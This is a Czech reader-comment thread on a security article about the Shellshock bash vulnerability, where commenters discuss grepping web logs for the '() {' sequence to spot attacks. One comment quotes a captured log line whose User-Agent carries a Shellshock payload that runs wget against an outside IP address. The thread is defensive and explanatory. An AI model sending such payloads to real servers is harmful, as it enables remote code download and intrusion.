Vlákno názorů k článku Postřehy z bezpečnosti: jste šokováni chybou shellu? od Ondřej Caletka - Mnohem efektivnější je grepovat logy na výskyt sekvence...
-
Ondřej CaletkaZlatý podporovatelMnohem efektivnější je grepovat logy na výskyt sekvence
() {, která musí vždy vypadat takto. Ale stejně takovým způsobem odhalíte jen Script Kiddies, které byly tak hloupé, že exploit umístily do hlavičky User-Agent, která se loguje.Přesto se něco zajímavého najde. Tohle dítě se třeba ani neobtěžovalo s nastudováním HTTP protokolu a tak metodou GET požaduje celou filesystémovou cestu :)
[29/Sep/2014:02:12:28 +0200] "GET /var/www/cgi-bin/test-cgi HTTP/1.1" 404 345 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\"" -
Martin ČmelíkZlatý podporovatelDobry den,
funkci lze v bashi definovat i bez zavorek http://tldp.org/LDP/abs/html/functions.html
Jak jsem psal, jedna se o "nejpopularnejsi" retezec. Je jasne, ze to neodhali vse.
Dekuji za reakci
-
Ondřej CaletkaZlatý podporovatel
Ano, funkci lze deklarovat i bez závorek, ale při přenosu funkce do subshellu se přenáší vždy proměnnou, jejíž obsah začíná na dvojici kulatých závorek:
$ function ahoj { echo ahoj svete; } $ export -f ahoj $ dash -c 'echo $ahoj' () { echo ahoj svete } -
Ondřej CaletkaZlatý podporovatel
Mýlíte se. Když se vrátíme na začátek, tak podstata exploitu je v tom, že někdo do prostředí podstrčí proměnnou, jejíž obsah začíná na dvě kulaté závorky. V případě zneužití CGI to znamená odeslání HTTP hlavičky, jejíž obsah začíná na dvě kulaté závorky. Bez těch dvou kulatých závorek to prostě nejde. Více najdete v pátečním článku.
Samozřejmě, pokud nelogujete všechny HTTP hlavičky všech požadavků, dostanou se vám do logu jen takové požadavky, které používají speciálně upravené jméno v hlavičce
User-Agent. -
Ondřej CaletkaZlatý podporovatel
Ano, funguje. ale tohle není žádný exploit, jednoduše jste napsal skript, co nadefinuje funkci a následně spustí jiný příkaz.
Asi se budu opakovat, ale podstata exploitu je v tom, že speciální proměnnou prostředí donutíte bash aby spustil to, co mu v té proměnné prostředí určíte. A v takovém případě ta proměnná prostě musí začínat na dvě kulaté závorky, jinak ji bash vezme jako obyčejnou proměnnou a ne jako import funkce.
-
Martin ČmelíkZlatý podporovatel
Diky za objasneni
bohuzel to vypada ze "()" se vyskytuje obcas i v regulernich dotazech, takze prochazeni logu chce hodne filtrovani dle konkretniho prostredi
-
Ondřej CaletkaZlatý podporovatel
Zkuste dvě závorky na začátku řetězce, následované bílou mezerou...
-
Martin ČmelíkZlatý podporovatel
To pak narazi clovek i na takto zvlastni User-Agent header :]
"Mozilla/4.0 (compatible; MSIE 8.0; !$[<](&$^[$@|))!))\%#!&*>\>\))*)@))(|!|^!!!)()@; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
